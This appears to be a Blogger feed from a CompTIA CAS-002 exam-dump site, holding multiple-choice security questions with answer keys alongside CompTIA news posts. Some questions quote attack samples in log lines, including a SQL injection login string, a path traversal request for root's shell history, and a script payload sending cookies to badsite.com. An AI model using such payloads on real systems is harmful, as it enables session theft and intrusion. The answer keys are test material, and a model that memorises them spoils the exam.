tag:blogger.com,1999:blog-21595019064896683882023-11-16T09:55:52.436-08:00CAS-002 Exam Questions AnswersUnknownnoreply@blogger.comBlogger31125tag:blogger.com,1999:blog-2159501906489668388.post-21421108178916351812018-12-28T03:31:00.000-08:002018-12-28T03:31:02.395-08:00CompTIA CAS-002 Questions Answers<b>A company is in the process of outsourcing its customer relationship management system to a cloud provider. It will host the entire organization's customer database. The database will be accessed by both the company's users and its customers. The procurement department has asked what security activities must be performed for the deal to proceed. Which of the following are the MOST appropriate security activities to be performed as part of due diligence? (Select TWO).</b><br />
<br /><b>A.</b> Physical penetration test of the datacenter to ensure there are appropriate controls.<br /><b>B.</b> Penetration testing of the solution to ensure that the customer data is well protected.<br /><b>C.</b> Security clauses are implemented into the contract such as the right to audit.<br /><b>D. </b>Review of the organizations security policies, procedures and relevant hosting certifications.<br /><b>E. </b>Code review of the solution to ensure that there are no back doors located in the software.<br />
<br /><b>Answer: CD</b><br /><br /><b><br />An organization is selecting a SaaS provider to replace its legacy, in house Customer Resource Management (CRM) application. Which of the following ensures the organization mitigates the risk of managing separate user credentials?</b><br />
<br /><b>A.</b> Ensure the SaaS provider supports dual factor authentication.<br /><b>B. </b>Ensure the SaaS provider supports encrypted password transmission and storage.<br /><b>C. </b>Ensure the SaaS provider supports secure hash file exchange.<br /><b>D. </b>Ensure the SaaS provider supports role-based access control.<br /><b>E.</b> Ensure the SaaS provider supports directory services federation.<br />
<br /><b>Answer: E</b>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-25411171844000357692018-08-26T21:42:00.001-07:002018-08-26T21:42:23.679-07:00CompTIA CAS-002 Question Answer<b>The Information Security Officer (ISO) is reviewing new policies that have been recently made effective and now apply to the company. Upon review, the ISO identifies a new requirement to implement two-factor authentication on the company's wireless system. Due to budget constraints, the company will be unable to implement the requirement for the next two years. The ISO is required to submit a policy exception form to the Chief Information Officer (CIO). Which of the following are MOST important to include when submitting the exception form? (Select THREE).</b><br />
<br />
<b>A. </b>Business or technical justification for not implementing the requirements.<br />
<b>B. </b>Risks associated with the inability to implement the requirements.<br />
<b>C. </b>Industry best practices with respect to the technical implementation of the current controls.<br />
<b>D. </b>All sections of the policy that may justify non-implementation of the requirements.<br />
<b>E. </b>A revised DRP and COOP plan to the exception form.<br />
<b>F. </b>Internal procedures that may justify a budget submission to implement the new requirement.<br />
<b>G.</b> Current and planned controls to mitigate the risks.<br />
<br />
<b>Answer: ABG</b><br />
<br />
<br />
<br />
<b>The Chief Information Officer (CIO) is reviewing the IT centric BIA and RA documentation. The documentation shows that a single 24 hours downtime in a critical business function will cost the business $2.3 million. Additionally, the business unit which depends on the critical business function has determined that there is a high probability that a threat will materialize based on historical data. The CIO's budget does not allow for full system hardware replacement in case of a catastrophic failure, nor does it allow for the purchase of additional compensating controls. Which of the following should the CIO recommend to the finance director to minimize financial loss?</b><br />
<br />
<b>A.</b> The company should mitigate the risk.<br />
<b>B. </b>The company should transfer the risk.<br />
<b>C. </b>The company should avoid the risk.<br />
<b>D. </b>The company should accept the risk.<br />
<br />
<b>Answer: B</b>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-87731954650511438572018-02-23T03:43:00.002-08:002018-02-23T03:43:28.240-08:00CompTIA CAS-002 Question Answer<b>The Chief Executive Officer (CEO) of a large prestigious enterprise has decided to reduce business costs by outsourcing to a third party company in another country. Functions to be outsourced include: business analysts, testing, software development and back office functions that deal with the processing of customer data. The Chief Risk Officer (CRO) is concerned about the outsourcing plans. Which of the following risks are MOST likely to occur if adequate controls are not implemented?</b><br /><br /><b>A.</b> Geographical regulation issues, loss of intellectual property and interoperability agreement issues<br /><b>B.</b> Improper handling of client data, interoperability agreement issues and regulatory issues<br /><b>C. </b>Cultural differences, increased cost of doing business and divestiture issues<br /><b>D.</b> Improper handling of customer data, loss of intellectual property and reputation damage<br /><br /><b>Answer: D<br /><br /><br />A security analyst has been asked to develop a quantitative risk analysis and risk assessment for the company's online shopping application. Based on heuristic information from the Security Operations Center (SOC), a Denial of Service Attack (DoS) has been successfully executed 5 times a year. The Business Operations department has determined the loss associated to each attack is $40,000. After implementing application caching, the number of DoS attacks was reduced to one time a year. The cost of the countermeasures was $100,000. Which of the following is the monetary value earned during the first year of operation?</b><br /><br /><b>A. </b>$60,000<br /><b>B.</b> $100,000<br /><b>C.</b> $140,000<br /><b>D. </b>$200,000<br /><br /><b>Answer: A</b>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-60930684098538545272017-12-22T03:26:00.004-08:002017-12-22T03:26:50.468-08:00CompTIA Offers Stackable Certifications<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="285" data-original-width="770" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJtrcjUBxJIho9WsvtUd0l-N-CvocA_333QUGK9YsawkP0Yb-C6KWGnlFxEMlBbWq85uhcbRGUevwFZIj4hvFIuXdOuW2tGa3yxgGK52z9FXS6t0SSPiAys2jE_qGWGI0eDU5z3GiHHB8/s640/1.jpg" width="640" /></div>
<br />
CompTIA presented "Stackable Certifications" on Wednesday, a new destination for many of the neutral skills certifications of the providers it offers.<br />
<br />
CompTIA's stackable certifications follow two professional CompTIA routes: infrastructure and cybersecurity, and offer a series of eligible routes to obtain a stackable certification.<br />
<br />
Calling this a major expansion of its credentialing program, CompTIA notes that a stackable certification recognizes the great experience of a certification holder and their firm commitment to continuous professional growth and development.<br />
<br />
"Technology professionals who have earned CompTIA Stackable Certifications have done so by passing rigorous industry-developed exams to validate the technical and business skills that have the greatest demand in today's economy," said Todd Thibodeaux, president and CEO of CompTIA.<br />
<br />
<b>Here are the routes for CompTIA certified IT professionals to attain a stackable certification:</b><br />
<br />
<ul>
<li> CompTIA A+ and CompTIA Network+ = CompTIA IT Operations Specialist</li>
<li> CompTIA A+ and CompTIA Linux+ = CompTIA Systems Support Specialist</li>
<li> CompTIA Network+ and CompTIA Server+ = CompTIA Network Infrastructure Professional</li>
<li> CompTIA Network+ and CompTIA Cloud+ = CompTIA Cloud Administration Professional</li>
<li> CompTIA A+, CompTIA Network+ and CompTIA Security+ = CompTIA Secure Infrastructure Associate</li>
<li> CompTIA Security + and CompTIA Cybersecurity Analyst = CompTIA Security Analytics Specialist</li>
<li> CompTIA Security+, CompTIA Cybersecurity Analyst and CompTIA Advanced Security Practitioner = CompTIA Security Analytics Expert</li>
</ul>
<br />
More than 145,000 IT professionals who obtained more than one CompTIA certification obtained a CompTIA Stackable Certification.<br />
<br />
<b>How does it work?</b><br />
<br />
Stackable certifications follow CompTIA's two professional pathways: CompTIA Infrastructure Career Pathway and CompTIA Cybersecurity Career Pathway. Then, within each route, the Stackable certifications are classified by experience level. Specialist: early career IT professional with less than two years of experience; Professional: mid-level IT professional with two to five years of experience; and Expert: established IT professional with more than five years of experience.<br />
<br />
Stackable certifications require active CE certifications. If you have a "good for life" certification, that also counts for a stackable certification as long as you re-certify and validate that your skills are up to date, CompTIA said.<br />
<br />
"More than any other certifying agency, CompTIA makes extensive use of performance-based questions and simulations on its exams," said James Stanger, CompTIA's chief technology evangelist. "These simulations accurately reflect the real-world scenarios that IT professionals face, which requires examiners to demonstrate networking skills, cybersecurity and other areas under the pressure of a timed test."Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-13291980818933033162017-11-08T22:35:00.000-08:002017-11-16T22:36:28.870-08:00CompTIA CAS-002 Question Answer<b>Which stage of the change management process deals with what should be done if the change is unsuccessful?</b><br />
<br />
<b>A. </b>Remediation planning<br />
<b>B. </b>Categorization<br />
<b>C.</b> Prioritization<br />
<b>D. </b>Review and close<br />
<br />
<b>Answer: A</b>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-61055334916781733042017-11-08T22:32:00.002-08:002017-11-08T22:32:19.588-08:00CompTIA CAS-002 Question Answer<b>An insurance company is looking to purchase a smaller company in another country. Which of the following tasks would the security administrator perform as part of the security due diligence?</b><br />
<br /><b>A.</b> Review switch and router configurations<br /><b>B.</b> Review the security policies and standards<br /><b>C. </b>Perform a network penetration test<br /><b>D.</b> Review the firewall rule set and IPS logs<br />
<br /><b>Answer: B</b><br /><br /><b><br />A new piece of ransomware got installed on a company's backup server which encrypted the hard drives containing the OS and backup application configuration but did not affect the deduplication data hard drives. During the incident response, the company finds that all backup tapes for this server are also corrupt. Which of the following is the PRIMARY concern?</b><br />
<br /><b>A. </b>Determining how to install HIPS across all server platforms to prevent future incidents<br /><b>B.</b> Preventing the ransomware from re-infecting the server upon restore<br /><b>C. </b>Validating the integrity of the deduplicated data<br /><b>D. </b>Restoring the data will be difficult without the application configuration<br />
<br /><b>Answer: D</b><br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-39837352705785433642017-10-27T02:37:00.000-07:002017-10-27T02:37:01.428-07:00CompTIA CAS-002 Question Answer<b>The risk manager has requested a security solution that is centrally managed, can easily be updated, and protects end users' workstations from both known and unknown malicious attacks when connected to either the office or home network. Which of the following would BEST meet this requirement?</b><br />
<br />
<b>A.</b> HIPS<br />
<b>B.</b> UTM<br />
<b>C. </b>Antivirus<br />
<b>D.</b> NIPS<br />
<b>E.</b> DLP<br />
<br />
<b>Answer: A</b><br />
<br />
<br />
<br />
<b>Which of the following describes a risk and mitigation associated with cloud data storage?</b><br />
<br />
<b>A.</b> Risk: Shared hardware caused data leakage<br />
Mitigation: Strong encryption at rest<br />
<b>B.</b> Risk: Offsite replication<br />
Mitigation: Multi-site backups<br />
<b>C.</b> Risk: Data loss from de-duplication<br />
Mitigation: Dynamic host bus addressing<br />
<b>D.</b> Risk: Combined data archiving<br />
Mitigation: Two-factor administrator authentication<br />
<br />
<b>Answer: A</b>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-58048875142321359032017-09-12T23:34:00.001-07:002017-09-12T23:34:30.312-07:00CompTIA CAS-002 Question Answer<b>A developer has implemented a piece of client-side JavaScript code to sanitize a user's provided input to a web page login screen. The code ensures that only the upper case and lower case letters are entered in the username field, and that only a 6-digit PIN is entered in the password field. A security administrator is</b><br />
<b>concerned with the following web server log:</b><br />
<b>10.235.62.11 - [02/Mar/2014:06:13:04] "GET /site/script.php?user=admin&pass=pass%20or %201=1 HTTP/1.1" 200 5724</b><br />
<b>Given this log, which of the following is the security administrator concerned with and which fix should be implemented by the developer?</b><br />
<br />
<b>A. </b>The security administrator is concerned with nonprintable characters being used to gain administrative access, and the developer should strip all nonprintable characters.<br />
<b>B. </b>The security administrator is concerned with XSS, and the developer should normalize Unicode characters on the browser side.<br />
<b>C.</b> The security administrator is concerned with SQL injection, and the developer should implement server side input validation.<br />
<b>D. </b>The security administrator is concerned that someone may log on as the administrator, and the developer should ensure strong passwords are enforced.<br />
<br />
<b>Answer: C</b><br />
<br />
<br />
<b>The security administrator finds unauthorized tables and records, which were not present before, on a Linux database server. The database server communicates only with one web server, which connects to the database server via an account with SELECT only privileges. Web server logs show the following:</b><br />
<b>90.76.165.40 - [08/Mar/2014:10:54:04] "GET calendar.php?create%20table%20hidden HTTP/1.1" 200 5724</b><br />
<b>90.76.165.40 - [08/Mar/2014:10:54:05] "GET ../../../root/.bash_history HTTP/1.1" 200 5724 90.76.165.40 - [08/Mar/2014:10:54:04] "GET index.php?</b><br />
<b>user=<script>Create</script> HTTP/1.1" 200 5724</b><br />
<b>The security administrator also inspects the following file system locations on the database server using the command `ls -al /root'</b><br />
<b>drwxrwxrwx 11 root root 4096 Sep 28 22:45 .</b><br />
<b>drwxr-xr-x 25 root root 4096 Mar 8 09:30 ..</b><br />
<b>-rws------ 25 root root 4096 Mar 8 09:30 .bash_history -rw------- 25 root root 4096 Mar 8 09:30 .bash_history -rw------- 25 root root 4096 Mar 8 09:30 .profile</b><br />
<b>-rw------- 25 root root 4096 Mar 8 09:30 .ssh</b><br />
<b>Which of the following attacks was used to compromise the database server and what can the security administrator implement to detect such attacks in the future?</b><br />
<b>(Select TWO).</b><br />
<br />
<b>A. </b>Privilege escalation<br />
<b>B. </b>Brute force attack<br />
<b>C. </b>SQL injection<br />
<b>D.</b> Cross-site scripting<br />
<b>E.</b> Using input validation, ensure the following characters are sanitized: <><br />
<b>F. </b>Update crontab with: find / \( -perm -4000 \) type f print0 | xargs -0 ls l | email.sh<br />
<b>G.</b> Implement the following PHP directive: $clean_user_input = addslashes($user_input)<br />
<b>H. </b>Set an account lockout policy<br />
<br />
<b>Answer: AF</b>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-5570630352253039292017-07-20T00:05:00.002-07:002017-07-20T00:05:15.116-07:00CAS-002 VCE<div style="text-align: center;">
<div style="display: block; font-family: "helvetica" , "arial" , sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin: 12px auto 6px auto;">
</div>
<iframe class="scribd_iframe_embed" data-aspect-ratio="1.7790927021696252" data-auto-height="false" frameborder="0" height="600" id="doc_68311" scrolling="no" src="https://www.scribd.com/embeds/354241798/content?start_page=1&view_mode=scroll&access_key=key-TLTd2Yp6RKkES6k6wKcq&show_recommendations=true" width="100%"></iframe>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-81492491068676573152017-07-20T00:03:00.000-07:002017-07-20T00:03:55.932-07:00CompTIA CAS-002 VCE Questions Answers<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="360" src="https://www.youtube.com/embed/_T1cuF9KuRE" width="640"></iframe>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-24610096004487332972017-06-12T22:39:00.005-07:002017-06-12T22:39:53.636-07:00CompTIA CAS-002 Question Answer<b>A security administrator is shown the following log excerpt from a Unix system:</b><br />
<b><br /></b>
<b>2013 Oct 10 07:14:57 web14 sshd[1632]: Failed password for root from 198.51.100.23 port 37914 ssh2</b><br />
<b>2013 Oct 10 07:14:57 web14 sshd[1635]: Failed password for root from 198.51.100.23 port 37915 ssh2</b><br />
<b>2013 Oct 10 07:14:58 web14 sshd[1638]: Failed password for root from 198.51.100.23 port 37916 ssh2</b><br />
<b>2013 Oct 10 07:15:59 web14 sshd[1640]: Failed password for root from 198.51.100.23 port 37918 ssh2</b><br />
<b>2013 Oct 10 07:16:00 web14 sshd[1641]: Failed password for root from 198.51.100.23 port 37920 ssh2</b><br />
<b>2013 Oct 10 07:16:00 web14 sshd[1642]: Successful login for root from 198.51.100.23 port 37924 ssh2</b><br />
<b>Which of the following is the MOST likely explanation of what is occurring and the BEST immediate response? (Select TWO).</b><br />
<br />
<b>A. </b>An authorized administrator has logged into the root account remotely.<br />
<b>B. </b>The administrator should disable remote root logins.<br />
<b>C. </b>Isolate the system immediately and begin forensic analysis on the host.<br />
<b>D. </b>A remote attacker has compromised the root account using a buffer overflow in sshd.<br />
<b>E. </b>A remote attacker has guessed the root password using a dictionary attack.<br />
<b>F. </b>Use iptables to immediately DROP connections from the IP 198.51.100.23.<br />
<b>G.</b> A remote attacker has compromised the private key of the root account. <br />
<b>H. </b>Change the root password immediately to a password not found in a dictionary.<br />
<br />
<b>Answer: CE</b><br />
<br />
<br />
<b>A security administrator wants to prevent sensitive data residing on corporate laptops and desktops from leaking outside of the corporate network. The company has already implemented full-disk encryption and has disabled all peripheral devices on its desktops and laptops. Which of the following additional controls MUST be implemented to minimize the risk of data leakage? (Select TWO).</b><br />
<br />
<b>A.</b> A full-system backup should be implemented to a third-party provider with strong encryption for data in transit.<br />
<b>B.</b> A DLP gateway should be installed at the company border.<br />
<b>C.</b> Strong authentication should be implemented via external biometric devices.<br />
<b>D. </b>Full-tunnel VPN should be required for all network communication.<br />
<b>E. </b>Full-drive file hashing should be implemented with hashes stored on separate storage.<br />
<b>F.</b> Split-tunnel VPN should be enforced when transferring sensitive data.<br />
<br />
<b>Answer: BD</b><br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-1933203782935790512017-05-08T00:31:00.000-07:002017-05-08T00:31:10.228-07:00U.S. IT Sector Employment Reverses Course, Sheds 3,000 Jobs In April, CompTIA Analysis Finds<div class="separator" style="clear: both; text-align: center;">
<img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKFuL1_9DfcVIgkvur_DZowNg_D9LPQH_nGD_jiRvvIxL0n4wanXJODFqeDmSr6yVSdaIJC7zNByfWAMKO3GNtrienA_VOPgOagSmUnoH7sP55XwgzH1D99Ez1Pzk82SiQhpGv5GdayEs/s640/1.jpg" width="640" /></div>
<br />
Employment growth in the US information technology (IT) sector stagnated in April, as employment fell by an estimated 3,000 positions, according to CompTIA IT Employment Tracker released today by the association World leader in technology.<br />
<br />
April job losses in telecoms (up to 5,300 jobs) and manufacturing of computers and electronic products (minus 1,700 jobs) offset gains in other employment categories, CompTIA's analysis of the current Bureau of Labor Statistics revealed.<br />
<br />
IT services and customer software design marked the categories with job growth in April with the addition of 2,600 positions. Other information services, including service portals (+800) and data processing, hosting and related services (+600) also posted employment gains last month.<br />
<br />
During the year, employment growth in the IT sector remained in a positive territory, an estimated 49,000 jobs to approximately 4.4 million workers. The category of software and IT services has been the strongest in 2017, totaling 84,200 jobs. The biggest decrease has occurred in telecommunications, which has lost 28,200 jobs so far this year.<br />
<br />
"Despite slow IT job growth over the past three months, conditions remain favorable for long-term employment gains," said Tim Herbert, senior vice president of research and market intelligence at CompTIA. "The industries of the United States economy continue to increase their dependence on digital technology and services, which augurs well for employment gains among these segments of workers."<br />
<br />
The second component of the nation's workforce - IT occupations in all other industries - grew by an estimated 90,000 jobs in April, spending three months of declines.<br />
<br />
Jobs for the central IT positions were basically flat in April. Software developers are still the most active occupation.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-14433648522244755872017-04-07T02:46:00.001-07:002017-04-07T02:46:17.275-07:00CompTIA CAS-002 Braindumps<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="360" src="https://www.youtube.com/embed/zc43XgnrgeE" width="640"></iframe>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-43286121981100823972017-04-07T02:45:00.001-07:002017-04-07T02:45:32.245-07:00CompTIA CAS-002 PDF Dumps<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="485" marginheight="0" marginwidth="0" scrolling="no" src="//www.slideshare.net/slideshow/embed_code/key/xcViRG9q7fSIZt" style="border-width: 1px; border: 1px solid #ccc; margin-bottom: 5px; max-width: 100%;" width="595"> </iframe> <br />
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-60758392545578051182016-09-01T23:49:00.005-07:002017-01-03T22:03:03.383-08:00Pass4sure CAS-002 Question Answer<b>A security administrator wants to deploy a dedicated storage solution which is inexpensive, can natively integrate with AD, allows files to be selectively encrypted and is suitable for a small number of users at a satellite office. Which of the following would BEST meet the requirement?</b><br />
<br />
<b>A. </b>SAN<br />
<b>B.</b> NAS<br />
<b>C.</b> Virtual SAN<br />
<b>D. </b>Virtual storage<br />
<br />
<b>Answer: B</b><br />
<br />
<b><br />At 9:00 am each morning, all of the virtual desktops in a VDI implementation become extremely slow and/or unresponsive. The outage lasts for around 10 minutes, after which everything runs properly again. The administrator has traced the problem to a lab of thin clients that are all booted at 9:00 am each morning. Which of the following is the MOST likely cause of the problem and the BEST solution? (Select TWO).</b><br />
<br />
<b>A.</b> Add guests with more memory to increase capacity of the infrastructure.<br />
<b>B.</b> A backup is running on the thin clients at 9am every morning.<br />
<b>C. </b>Install more memory in the thin clients to handle the increased load while booting.<br />
<b>D. </b>Booting all the lab desktops at the same time is creating excessive I/O.<br />
<b>E. </b>Install 10-Gb uplinks between the hosts and the lab to increase network capacity.<br />
<b>F.</b> Install faster SSD drives in the storage system used in the infrastructure.<br />
<b>G.</b> The lab desktops are saturating the network while booting.<br />
<b>H. </b>The lab desktops are using more memory than is available to the host systems.<br />
<br />
<b>Answer: DF</b><br />
<br />
<b> <a href="https://www.examcollection.us/CAS-002-vce.html" target="_blank">CAS-002 VCE</a> <a href="https://www.examcollection.us/JK0-018-vce.html" target="_blank">Exam JK0-018 VCE</a> <a href="https://www.examcollection.us/vendor-CompTIA.html" target="_blank">CompTIA Certification Exams VCE</a> </b>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-31699859308250803572016-07-13T02:06:00.002-07:002016-10-04T00:36:31.266-07:00Pass4sure CAS-002 Question Answer<b>A government agency considers confidentiality to be of utmost importance and availability issues to be of least importance. Knowing this, which of the following correctly orders various vulnerabilities in the order of MOST important to LEAST important?</b><br />
<br />
<b>A. </b>Insecure direct object references, CSRF, Smurf<br />
<b>B.</b> Privilege escalation, Application DoS, Buffer overflow<br />
<b>C.</b> SQL injection, Resource exhaustion, Privilege escalation<br />
<b>D.</b> CSRF, Fault injection, Memory leaks<br />
<br />
<b>Answer: A</b>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-22967571484437277142016-06-09T21:03:00.002-07:002016-06-09T21:03:30.527-07:00Pass4sure CAS-002 Question Answer<b>select id, firstname, lastname from authors <br />User input= firstname= Hack;man <br />lastname=Johnson <br />Which of the following types of attacks is the user attempting? </b><br />
<b></b><br /><b>A. </b>XML injection <br /><b>B. </b>Command injection <br /><b>C.</b> Cross-site scripting <br /><b>D. </b>SQL injection<br />
<br /><b>Answer: D</b>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-59697290240173592016-05-10T04:17:00.002-07:002016-05-10T04:17:28.083-07:00Pass4sure CAS-002 Question Answer<b>An application present on the majority of an organization’s 1,000 systems is vulnerable to a buffer overflow attack. Which of the following is the MOST comprehensive way to resolve the issue? </b><br />
<br /><b>A. </b>Deploy custom HIPS signatures to detect and block the attacks.<br />
<b>B.</b> Validate and deploy the appropriate patch.<br />
<b>C. </b>Run the application in terminal services to reduce the threat landscape.<br />
<b>D.</b> Deploy custom NIPS signatures to detect and block the attacks.<br />
<br /><b>Answer: B</b>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-54965351510542219912016-04-06T00:33:00.003-07:002016-04-06T00:33:43.648-07:00Pass4sure CAS-002 Question Answer<b>An organization is concerned with potential data loss in the event of a disaster, and created a backup datacenter as a mitigation strategy. The current storage method is a single NAS used by all servers in both datacenters. Which of the following options increases data availability in the event of a datacenter failure? </b><br />
<br /><b>A.</b> Replicate NAS changes to the tape backups at the other datacenter. <br /><b>B. </b>Ensure each server has two HBAs connected through two routes to the NAS. <br /><b>C. </b>Establish deduplication across diverse storage paths. <br /><b>D.</b> Establish a SAN that replicates between datacenters.<br />
<br /><b>Answer: D</b>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-9869307600681072872016-02-29T21:59:00.001-08:002016-02-29T21:59:20.423-08:00Pass4sure CAS-002 Question Answer<b>A security administrator was doing a packet capture and noticed a system communicating with an unauthorized address within the 2001::/32 prefix. The network administrator confirms there is no IPv6 routing into or out of the network. </b><br />
<b>Which of the following is the BEST course of action? </b><br /><br /><b>A. </b>Investigate the network traffic and block UDP port 3544 at the firewall <br /><b>B. </b>Remove the system from the network and disable IPv6 at the router <br /><b>C.</b> Locate and remove the unauthorized 6to4 relay from the network <br /><b>D.</b> Disable the switch port and block the 2001::/32 traffic at the firewall<br /><br /><b>Answer: A</b><br />
<b><br /></b>
<b>A security administrator notices the following line in a server's security log: <input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</script>') + "'; The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack? </b><br /><b>A. </b>WAF <br /><b>B.</b> Input validation <br /><b>C.</b> SIEM <br /><b>D.</b> Sandboxing <br /><b>E. </b>DAM<br /><br /><b>Answer: A</b>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-85018637813593787762016-02-17T21:58:00.003-08:002016-10-04T00:37:57.159-07:00CompTIA Announces 2016 Member of the YearCompTIA today announced John Tippett, vice president and general manager of Aisle8, is the association's 2016 Member of the Year. An inaugural awards ceremony in Tippett's honor will take place next month at the CompTIA Annual Member meeting, to be held March 22-24 at the Fairmont Chicago Millennium Park Hotel.<br />
<br />
Tippett joined CompTIA in 2010, and over the last five years, has held numerous leadership roles within CompTIA's Member Communities including the Managed Services Community where he served as chair from 2014-2015, and vice chair in 2013. Tippett also served as a member of CompTIA's Communities Executive Board from 2013 to 2015, and continues to serve as a member of CompTIA's Ambassadors Group. He is a familiar face at <b>CompTIA's Annual Member Meeting and ChannelCon</b>, and a recognized business leader within the MSP community.<br />
<br />
"John has been instrumental in spearheading the growth of our Managed Services Community, and providing leadership and guidance to our members as they transition to a more proactive service delivery model," said Nancy Hammervik, senior vice president, Industry Relations. "In a short time, John has helped shape our community and developed actionable content that is speeding time to market and helping members thrive. John's leadership and constant motivation to do business better is contagious and has helped MSPs, and the IT industry, better understand the benefits of managed services."<br />
<br />
In 2011, Tippett participated as a subject matter expert in the development of CompTIA's standards around Managed Services. Last year, he also led the development of The Lifecycle of a Managed Services infographic, which is now included in CompTIA's Quick Start Guide to Managed Services. The easy-to-reference visual aid demonstrates to MSPs and IT service providers the role that marketing, sales, client on boarding, and other elements play in building a successful managed services business.<br />
<br />
"It is an honor to be recognized by CompTIA as the association's inaugural 'Member of the Year,'" said Tippett. "I have gained so much from my involvement with CompTIA, and I am equally excited and humbled to receive this award. It has been gratifying to work with CompTIA staff and members over the years, and I am grateful for what I have gained and for the opportunity to give back to other members. Being part of CompTIA has been a tremendously rewarding experience, and I am excited to see what the future holds."<br />
<br />
Established in 2016, the CompTIA Member of the Year Award celebrates the contributions and commitment of a single Premier Member to the greater community. Nominations are accepted and reviewed annually. Upon selection, CompTIA awards one member for his or her commitment, passion, professionalism and leadership toward advancing the industry in the prior 12 months. To learn more about the CompTIA Member of the Year award visit <a href="https://www.comptia.org/about-us/comptia-member-of-the-year-award">https://www.comptia.org/about-us/comptia-member-of-the-year-award</a>. Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-12716149367286807902016-02-14T22:48:00.000-08:002016-02-14T22:48:04.206-08:00Pass4sure CAS-002 Question Answer<b>Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim’s privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed. Which of the following BEST describes the application issue?</b> <br /><br /><b>A.</b> Integer overflow <br /><b>B.</b> Click-jacking<br /><b>C. </b>Race condition <br /><b>D.</b> SQL injection <br /><b>E.</b> Use after free <br /><b>F.</b> Input validation<br /><br /><b>Answer: E</b><br />
<b><br /></b>
<b>A developer is determining the best way to improve security within the code being developed. The developer is focusing on input fields where customers enter their credit card details. Which of the following techniques, if implemented in the code, would be the MOST effective in protecting the fields from malformed input? </b><br /><br /><b>A.</b> Client side input validation <br /><b>B. </b>Stored procedure <br /><b>C.</b> Encrypting credit card details <br /><b>D.</b> Regular expression matching<br /><br /><b>Answer: D</b>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-88559836790407047502016-02-04T03:44:00.001-08:002016-10-04T00:40:11.071-07:00CompTIA Thanks Department of Commerce, EU for New Safe Harbor Agreement<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSewB0DzbKoSLy-UV7gtqfK7PLo860w4R6CCZ_MVZVpqnr68cATxHz3C8Grn1k7Fe_YkRFmIle_mvG0-dtapLMbOyXLPGsi85aBhr0KUsnHR_Ze4wdTU0KQUq_nJQ_IDn-Ti1U3Dv7WbI/s1600/DC38135LOGO.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSewB0DzbKoSLy-UV7gtqfK7PLo860w4R6CCZ_MVZVpqnr68cATxHz3C8Grn1k7Fe_YkRFmIle_mvG0-dtapLMbOyXLPGsi85aBhr0KUsnHR_Ze4wdTU0KQUq_nJQ_IDn-Ti1U3Dv7WbI/s640/DC38135LOGO.jpg" width="640" /></a></div>
CompTIA, the Computing Technology Industry Association, released the following statement on a new draft Safe Harbor agreement (which will be called the "EU-U.S. Privacy Shield") announced today by European Commissioner Vera Jourova. <br />
<br />
The prior Safe Harbor agreement, which provided guidelines for U.S. companies to securely transfer data from the EU to the U.S., was struck down by the EU Court of Justice in October. Without a new agreement, thousands of U.S. companies would have been left without a way to transfer data across the Atlantic without risking penalties from European Data Protection Authorities. The following statement should be attributed to Elizabeth Hyman, Executive Vice President, CompTIA.<a href="http://www.testbells.com/CAS-002.html"><br /></a><br />
<br />
"We would like to thank the European Commission and the U.S. Department of Commerce for their hard work in crafting this new draft EU-U.S. Privacy Shield Agreement. This is a major step forward for the 4,000+ American companies who transferred data across the Atlantic under the Safe Harbor. However, there is much work to be done before this new agreement can be put into effect, and we hope the process continues to move forward in this critical time for the future of EU-U.S. commerce."<br />
<br />
<h3>
About CompTIA</h3>
<br />
The Computing Technology Industry Association (CompTIA) is the voice of the information technology industry. With approximately 2,000 member companies, 3,000 academic and training partners and nearly 2 million IT certifications issued, CompTIA is dedicated to advancing industry growth through educational programs, market research, networking events, professional certifications and public policy advocacy. Visit CompTIA online, Facebook, LinkedIn and Twitter.<br />
<br />
